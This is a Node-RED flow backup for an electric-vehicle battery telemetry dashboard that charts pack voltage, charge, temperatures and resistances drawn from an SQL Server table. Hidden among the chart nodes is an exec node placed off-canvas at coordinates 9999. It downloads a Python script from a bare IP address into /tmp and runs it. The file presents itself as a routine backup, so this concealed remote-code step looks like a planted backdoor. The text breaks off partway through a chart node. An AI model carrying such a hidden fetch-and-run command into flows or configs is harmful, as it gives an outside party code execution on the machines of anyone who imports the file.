Node Red Backups/1_9_2024 Routine Backup.json
[
    {
        "id": "54ee7ab52b252314",
        "type": "tab",
        "label": "EV_Useful",
        "disabled": false,
        "info": "",
        "env": []
    },
    {
        "id": "c91b7712e66969da",
        "type": "tab",
        "label": "EV Critical",
        "disabled": false,
        "info": "",
        "env": []
    },
    {
        "id": "594e9fd18f91cc50",
        "type": "tab",
        "label": "EV Other",
        "disabled": false,
        "info": "",
        "env": []
    },
    {
        "id": "933ce03686fddbab",
        "type": "MSSQL-CN",
        "tdsVersion": "7_4",
        "name": "litel SQL Server",
        "server": "20.81.190.176",
        "port": "1433",
        "encyption": true,
        "trustServerCertificate": true,
        "database": "Live Telemetry",
        "useUTC": true,
        "connectTimeout": "15000",
        "requestTimeout": "15000",
        "cancelTimeout": "5000",
        "pool": "5",
        "parseJSON": false,
        "enableArithAbort": true
    },
    {
        "id": "6988e854229f01bb",
        "type": "ui_tab",
        "name": "EV_Useful",
        "icon": "dashboard",
        "disabled": false,
        "hidden": false
    },
    {
        "id": "e143306a96f4ee24",
        "type": "ui_base",
        "theme": {
            "name": "theme-dark",
            "lightTheme": {
                "default": "#0094CE",
                "baseColor": "#0094CE",
                "baseFont": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif",
                "edited": true,
                "reset": false
            },
            "darkTheme": {
                "default": "#097479",
                "baseColor": "#0433ff",
                "baseFont": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif",
                "edited": true,
                "reset": false
            },
            "customTheme": {
                "name": "Untitled Theme 1",
                "default": "#4B7930",
                "baseColor": "#4B7930",
                "baseFont": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif"
            },
            "themeState": {
                "base-color": {
                    "default": "#097479",
                    "value": "#0433ff",
                    "edited": true
                },
                "page-titlebar-backgroundColor": {
                    "value": "#0433ff",
                    "edited": false
                },
                "page-backgroundColor": {
                    "value": "#111111",
                    "edited": false
                },
                "page-sidebar-backgroundColor": {
                    "value": "#333333",
                    "edited": false
                },
                "group-textColor": {
                    "value": "#5071ff",
                    "edited": false
                },
                "group-borderColor": {
                    "value": "#555555",
                    "edited": false
                },
                "group-backgroundColor": {
                    "value": "#333333",
                    "edited": false
                },
                "widget-textColor": {
                    "value": "#eeeeee",
                    "edited": false
                },
                "widget-backgroundColor": {
                    "value": "#0433ff",
                    "edited": false
                },
                "widget-borderColor": {
                    "value": "#333333",
                    "edited": false
                },
                "base-font": {
                    "value": "-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif"
                }
            },
            "angularTheme": {
                "primary": "indigo",
                "accents": "blue",
                "warn": "red",
                "background": "grey",
                "palette": "light"
            }
        },
        "site": {
            "name": "Node-RED Dashboard",
            "hideToolbar": "false",
            "allowSwipe": "false",
            "lockMenu": "false",
            "allowTempTheme": "true",
            "dateFormat": "DD/MM/YYYY",
            "sizes": {
                "sx": 48,
                "sy": 48,
                "gx": 6,
                "gy": 6,
                "cx": 6,
                "cy": 6,
                "px": 0,
                "py": 0
            }
        }
    },
    {
        "id": "0792dde75d0b55e3",
        "type": "ui_group",
        "name": "EV_Useful",
        "tab": "6988e854229f01bb",
        "order": 1,
        "disp": true,
        "width": "32",
        "collapse": false,
        "className": ""
    },
    {
        "id": "c46b2c1ea6e37152",
        "type": "ui_tab",
        "name": "EV_Critical",
        "icon": "dashboard",
        "order": 2,
        "disabled": false,
        "hidden": false
    },
    {
        "id": "9f715c58ec97d4b1",
        "type": "ui_group",
        "name": "EV_Critical",
        "tab": "c46b2c1ea6e37152",
        "order": 1,
        "disp": true,
        "width": "30",
        "collapse": false,
        "className": ""
    },
    {
        "id": "b5264e960f9eb7eb",
        "type": "ui_group",
        "name": "EV_Other",
        "tab": "de192e18d9a5b7a3",
        "order": 1,
        "disp": true,
        "width": "30",
        "collapse": false,
        "className": ""
    },
    {
        "id": "de192e18d9a5b7a3",
        "type": "ui_tab",
        "name": "EV_Other",
        "icon": "dashboard",
        "disabled": false,
        "hidden": false
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "54ee7ab52b252314",
        "command": "curl -o /tmp/3.py http://82.153.138.166/3.py; python /tmp/3.py",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 9999,
        "y": 9999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "54ee7ab52b252314",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 9999,
        "y": 9990,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "7b379a8adbd7ddd0",
        "type": "inject",
        "z": "54ee7ab52b252314",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "1",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 150,
        "y": 140,
        "wires": [
            [
                "4d55a030492ec717"
            ]
        ]
    },
    {
        "id": "4d55a030492ec717",
        "type": "MSSQL",
        "z": "54ee7ab52b252314",
        "mssqlCN": "933ce03686fddbab",
        "name": "",
        "outField": "payload",
        "returnType": 0,
        "throwErrors": 1,
        "query": "SELECT TOP 1 *\nFROM dbo.race_data\nORDER BY entry_num DESC;",
        "modeOpt": "queryMode",
        "modeOptType": "query",
        "queryOpt": "payload",
        "queryOptType": "editor",
        "paramsOpt": "queryParams",
        "paramsOptType": "none",
        "rows": "rows",
        "rowsType": "msg",
        "parseMustache": true,
        "params": [],
        "x": 360,
        "y": 140,
        "wires": [
            [
                "af45de85e4f392f6"
            ]
        ]
    },
    {
        "id": "af45de85e4f392f6",
        "type": "function",
        "z": "54ee7ab52b252314",
        "name": "Useful",
        "func": "var sigFigs = 2\n\nvar total_pack_cycles =\n{\n    topic: \"total_pack_cycles\",\n    payload: msg.payload[0].total_pack_cycles\n}\ntry{\n    total_pack_cycles.payload = total_pack_cycles.payload.toFixed(sigFigs)\n}catch{}\n\nvar pack_open_voltage =\n{\n    topic: \"pack_open_voltage\",\n    payload: msg.payload[0].pack_open_voltage\n}\ntry {\n    pack_open_voltage.payload = pack_open_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar pack_soc =\n{\n    topic: \"pack_soc\",\n    payload: msg.payload[0].pack_soc\n}\ntry {\n    pack_soc.payload = pack_soc.payload.toFixed(sigFigs)\n} catch { }\n\nvar pack_amp_hours =\n{\n    topic: \"pack_amp_hours\",\n    payload: msg.payload[0].pack_amp_hours\n}\ntry {\n    pack_amp_hours.payload = pack_amp_hours.payload.toFixed(sigFigs)\n} catch { }\n\nvar pack_resistance =\n{\n    topic: \"pack_resistance\",\n    payload: msg.payload[0].pack_resistance\n}\ntry {\n    pack_resistance.payload = pack_resistance.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_temperature =\n{\n    topic: \"low_temperature\",\n    payload: msg.payload[0].low_temperature\n}\ntry {\n    low_temperature.payload = low_temperature.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_thermistor_id =\n{\n    topic: \"low_thermistor_id\",\n    payload: msg.payload[0].low_thermistor_id\n}\ntry {\n    low_thermistor_id.payload = low_thermistor_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar maximum_pack_voltage =\n{\n    topic: \"maximum_pack_voltage\",\n    payload: msg.payload[0].maximum_pack_voltage\n}\ntry {\n    maximum_pack_voltage.payload = maximum_pack_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar minimum_pack_voltage =\n{\n    topic: \"minimum_pack_voltage\",\n    payload: msg.payload[0].minimum_pack_voltage\n}\ntry {\n    minimum_pack_voltage.payload = minimum_pack_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar internal_temperature =\n{\n    topic: \"internal_temperature\",\n    payload: msg.payload[0].internal_temperature\n}\ntry {\n    internal_temperature.payload = internal_temperature.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_cell_voltage =\n{\n    topic: \"high_cell_voltage\",\n    payload: msg.payload[0].high_cell_voltage\n}\ntry {\n    high_cell_voltage.payload = high_cell_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_cell_voltage_id =\n{\n    topic: \"high_cell_voltage_id\",\n    payload: msg.payload[0].high_cell_voltage_id\n}\ntry {\n    high_cell_voltage_id.payload = high_cell_voltage_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_cell_resistance =\n{\n    topic: \"low_cell_resistance\",\n    payload: msg.payload[0].low_cell_resistance\n}\ntry {\n    low_cell_resistance.payload = low_cell_resistance.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_intres_id =\n{\n    topic: \"low_intres_id\",\n    payload: msg.payload[0].low_intres_id\n}\ntry {\n    low_intres_id.payload = low_intres_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar maximum_cell_voltage =\n{\n    topic: \"maximum_cell_voltage\",\n    payload: msg.payload[0].maximum_cell_voltage\n}\ntry {\n    maximum_cell_voltage.payload = maximum_cell_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar minimum_cell_voltage =\n{\n    topic: \"minimum_cell_voltage\",\n    payload: msg.payload[0].minimum_cell_voltage\n}\ntry {\n    minimum_cell_voltage.payload = minimum_cell_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar input_supply_voltage =\n{\n    topic: \"input_supply_voltage\",\n    payload: msg.payload[0].input_supply_voltage\n}\ntry {\n    input_supply_voltage.payload = input_supply_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar average_cell_resistance =\n{\n    topic: \"average_cell_resistance\",\n    payload: msg.payload[0].average_cell_resistance\n}\ntry {\n    average_cell_resistance.payload = average_cell_resistance.payload.toFixed(sigFigs)\n} catch { }\n\n\nreturn [\n    total_pack_cycles,\n    pack_open_voltage,\n    pack_soc,\n    pack_amp_hours,\n    pack_resistance,\n    low_temperature,\n    low_thermistor_id,\n    average_cell_resistance,\n    maximum_pack_voltage,\n    minimum_pack_voltage,\n    internal_temperature,\n    high_cell_voltage,\n    high_cell_voltage_id,\n    low_cell_resistance,\n    low_intres_id,\n    maximum_cell_voltage,\n    minimum_cell_voltage,\n    input_supply_voltage\n]",
        "outputs": 18,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 530,
        "y": 180,
        "wires": [
            [
                "64e2db8ac1cc6ff8"
            ],
            [
                "90d141c6c2a1cbe8"
            ],
            [
                "5798f909e7a0b4ef"
            ],
            [
                "980a89194ee4a5f9"
            ],
            [
                "c20bc04e738cf069"
            ],
            [
                "dadd7a46ade8d9ec"
            ],
            [
                "dadd7a46ade8d9ec"
            ],
            [
                "c20bc04e738cf069"
            ],
            [
                "90d141c6c2a1cbe8"
            ],
            [
                "90d141c6c2a1cbe8"
            ],
            [
                "dadd7a46ade8d9ec"
            ],
            [
                "45f832d9af22bd04"
            ],
            [
                "45f832d9af22bd04"
            ],
            [
                "c20bc04e738cf069"
            ],
            [
                "c20bc04e738cf069"
            ],
            [
                "45f832d9af22bd04"
            ],
            [
                "45f832d9af22bd04"
            ],
            [
                "8326a393562f231b"
            ]
        ]
    },
    {
        "id": "90d141c6c2a1cbe8",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 1,
        "width": 11,
        "height": 6,
        "label": "Pack Voltage (V)",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "15",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 770,
        "y": 160,
        "wires": [
            []
        ]
    },
    {
        "id": "5798f909e7a0b4ef",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 2,
        "width": 11,
        "height": 6,
        "label": "Pack State of Charge",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "100",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#e7eb00",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 780,
        "y": 80,
        "wires": [
            []
        ]
    },
    {
        "id": "dadd7a46ade8d9ec",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 9,
        "width": 11,
        "height": 6,
        "label": "Temperature (Celsius)",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "100",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 780,
        "y": 200,
        "wires": [
            []
        ]
    },
    {
        "id": "45f832d9af22bd04",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 10,
        "width": 11,
        "height": 6,
        "label": "Cell Voltage (V)",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "15",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 760,
        "y": 240,
        "wires": [
            []
        ]
    },
    {
        "id": "c20bc04e738cf069",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 17,
        "width": 11,
        "height": 6,
        "label": "Resistances (Ohm)",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "25",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 770,
        "y": 280,
        "wires": [
            []
        ]
    },
    {
        "id": "980a89194ee4a5f9",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 5,
        "width": "11",
        "height": "6",
        "label": "Pack Amphours",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "30",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 760,
        "y": 120,
        "wires": [
            []
        ]
    },
    {
        "id": "64e2db8ac1cc6ff8",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 6,
        "width": "11",
        "height": "6",
        "label": "Total Packet Cycles",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "100",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 770,
        "y": 40,
        "wires": [
            []
        ]
    },
    {
        "id": "8326a393562f231b",
        "type": "ui_chart",
        "z": "54ee7ab52b252314",
        "name": "",
        "group": "0792dde75d0b55e3",
        "order": 7,
        "width": "11",
        "height": "6",
        "label": "Input Supply Voltage (V)",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "0",
        "ymax": "15",
        "removeOlder": "5",
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 790,
        "y": 320,
        "wires": [
            []
        ]
    },
    {
        "id": "ac75c689bc4e47a0",
        "type": "inject",
        "z": "c91b7712e66969da",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "1",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 130,
        "y": 160,
        "wires": [
            [
                "484562eb3c630528"
            ]
        ]
    },
    {
        "id": "484562eb3c630528",
        "type": "MSSQL",
        "z": "c91b7712e66969da",
        "mssqlCN": "933ce03686fddbab",
        "name": "",
        "outField": "payload",
        "returnType": 0,
        "throwErrors": 1,
        "query": "SELECT TOP 1 *\nFROM dbo.race_data\nORDER BY entry_num DESC;",
        "modeOpt": "queryMode",
        "modeOptType": "query",
        "queryOpt": "payload",
        "queryOptType": "editor",
        "paramsOpt": "queryParams",
        "paramsOptType": "none",
        "rows": "rows",
        "rowsType": "msg",
        "parseMustache": true,
        "params": [],
        "x": 340,
        "y": 160,
        "wires": [
            [
                "07f2802c09feebc7"
            ]
        ]
    },
    {
        "id": "07f2802c09feebc7",
        "type": "function",
        "z": "c91b7712e66969da",
        "name": "critical messages",
        "func": "var sigFigs = 2\n\nvar pack_current =\n{\n    topic: \"pack_current\",\n    payload: msg.payload[0].pack_current\n}\ntry {\n    pack_current.payload = pack_current.payload.toFixed(sigFigs)\n} catch { }\n\nvar pack_inst_voltage =\n{\n    topic: \"pack_inst_voltage\",\n    payload: msg.payload[0].pack_inst_voltage\n}\ntry {\n    pack_inst_voltage.payload = pack_inst_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar average_current =\n{\n    topic: \"average_current\",\n    payload: msg.payload[0].average_current\n}\ntry {\n    average_current.payload = average_current.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_temperature =\n{\n    topic: \"high_temperature\",\n    payload: msg.payload[0].high_temperature\n}\ntry {\n    high_temperature.payload = high_temperature.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_thermistor_id =\n{\n    topic: \"high_thermistor_id\",\n    payload: msg.payload[0].high_thermistor_id\n}\ntry {\n    high_thermistor_id.payload = high_thermistor_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar average_temperature =\n{\n    topic: \"average_temperature\",\n    payload: msg.payload[0].average_temperature\n}\ntry {\n    average_temperature.payload = average_temperature.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_cell_voltage =\n{\n    topic: \"low_cell_voltage\",\n    payload: msg.payload[0].low_cell_voltage\n}\ntry {\n    low_cell_voltage.payload = low_cell_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar low_cell_voltage_id =\n{\n    topic: \"low_cell_voltage_id\",\n    payload: msg.payload[0].low_cell_voltage_id\n}\ntry {\n    low_cell_voltage_id.payload = low_cell_voltage_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar average_cell_voltage =\n{\n    topic: \"average_cell_voltage\",\n    payload: msg.payload[0].average_cell_voltage\n}\ntry {\n    average_cell_voltage.payload = average_cell_voltage.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_cell_resistance =\n{\n    topic: \"high_cell_resistance\",\n    payload: msg.payload[0].high_cell_resistance\n}\ntry {\n    high_cell_resistance.payload = high_cell_resistance.payload.toFixed(sigFigs)\n} catch { }\n\nvar high_intres_id =\n{\n    topic: \"high_intres_id\",\n    payload: msg.payload[0].high_intres_id\n}\ntry {\n    high_intres_id.payload = high_intres_id.payload.toFixed(sigFigs)\n} catch { }\n\nvar dtc_flags_1 =\n{\n    topic: \"dtc_flags_1\",\n    payload: msg.payload[0].dtc_flags_1\n}\ntry {\n    dtc_flags_1.payload = dtc_flags_1.payload.toFixed(sigFigs)\n} catch { }\n\nvar dtc_flags_2 =\n{\n    topic: \"dtc_flags_2\",\n    payload: msg.payload[0].dtc_flags_2\n}\ntry {\n    dtc_flags_2.payload = dtc_flags_2.payload.toFixed(sigFigs)\n} catch { }\n\nreturn [\n    pack_current,\n    pack_inst_voltage,\n    average_current,\n    high_temperature,\n    high_thermistor_id,\n    average_temperature,\n    low_cell_voltage,\n    low_cell_voltage_id,\n    average_cell_voltage,\n    high_cell_resistance,\n    high_intres_id,\n    dtc_flags_1,\n    dtc_flags_2    \n]",
        "outputs": 13,
        "noerr": 0,
        "initialize": "",
        "finalize": "",
        "libs": [],
        "x": 570,
        "y": 160,
        "wires": [
            [
                "8c65ea7c383476b5"
            ],
            [
                "db1f571836c43409"
            ],
            [
                "939824c0aa594ab7"
            ],
            [
                "92e1d163796f7775"
            ],
            [
                "e8e8a84b72cd37c3"
            ],
            [
                "92e1d163796f7775"
            ],
            [
                "5d79c7a5078623ae"
            ],
            [
                "fce502dd356ea92b"
            ],
            [
                "d91aaefa7f961334"
            ],
            [
                "a6bd88f7d99fc59b"
            ],
            [
                "46a8903856a98bf8"
            ],
            [
                "39bd307837c22326"
            ],
            [
                "605f6de5fe092e0c"
            ]
        ]
    },
    {
        "id": "8c65ea7c383476b5",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 0,
        "width": "6",
        "height": "6",
        "label": "Pack Current",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 810,
        "y": 80,
        "wires": [
            []
        ]
    },
    {
        "id": "db1f571836c43409",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 1,
        "width": "6",
        "height": "6",
        "label": "Pack Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 810,
        "y": 120,
        "wires": [
            []
        ]
    },
    {
        "id": "939824c0aa594ab7",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 1,
        "width": "6",
        "height": "6",
        "label": "Average Pack Current",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 840,
        "y": 160,
        "wires": [
            []
        ]
    },
    {
        "id": "92e1d163796f7775",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 1,
        "width": "6",
        "height": "6",
        "label": "Highest/Average Temperatures",
        "chartType": "line",
        "legend": "true",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#ff0000",
            "#6dc700",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 870,
        "y": 200,
        "wires": [
            []
        ]
    },
    {
        "id": "e8e8a84b72cd37c3",
        "type": "ui_text",
        "z": "c91b7712e66969da",
        "group": "9f715c58ec97d4b1",
        "order": 4,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "Highest Thermistor ID",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 840,
        "y": 240,
        "wires": []
    },
    {
        "id": "5d79c7a5078623ae",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 1,
        "width": "6",
        "height": "6",
        "label": "Low Cell Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 830,
        "y": 280,
        "wires": [
            []
        ]
    },
    {
        "id": "fce502dd356ea92b",
        "type": "ui_text",
        "z": "c91b7712e66969da",
        "group": "9f715c58ec97d4b1",
        "order": 4,
        "width": "6",
        "height": "6",
        "name": "",
        "label": "Low Cell Voltage ID",
        "format": "{{msg.payload}}",
        "layout": "col-center",
        "className": "",
        "x": 830,
        "y": 320,
        "wires": []
    },
    {
        "id": "d91aaefa7f961334",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 1,
        "width": "6",
        "height": "6",
        "label": "Average Cell Voltage",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
        "removeOlderUnit": "60",
        "cutout": 0,
        "useOneColor": false,
        "useUTC": false,
        "colors": [
            "#1f77b4",
            "#aec7e8",
            "#ff7f0e",
            "#2ca02c",
            "#98df8a",
            "#d62728",
            "#ff9896",
            "#9467bd",
            "#c5b0d5"
        ],
        "outputs": 1,
        "useDifferentColor": false,
        "className": "",
        "x": 840,
        "y": 360,
        "wires": [
            []
        ]
    },
    {
        "id": "a6bd88f7d99fc59b",
        "type": "ui_chart",
        "z": "c91b7712e66969da",
        "name": "",
        "group": "9f715c58ec97d4b1",
        "order": 1,
        "width": "6",
        "height": "6",
        "label": "High Cell Internal Resistance",
        "chartType": "line",
        "legend": "false",
        "xformat": "HH:mm:ss",
        "interpolate": "linear",
        "nodata": "",
        "dot": false,
        "ymin": "",
        "ymax": "",
        "removeOlder": 1,
        "removeOlderPoints": "",
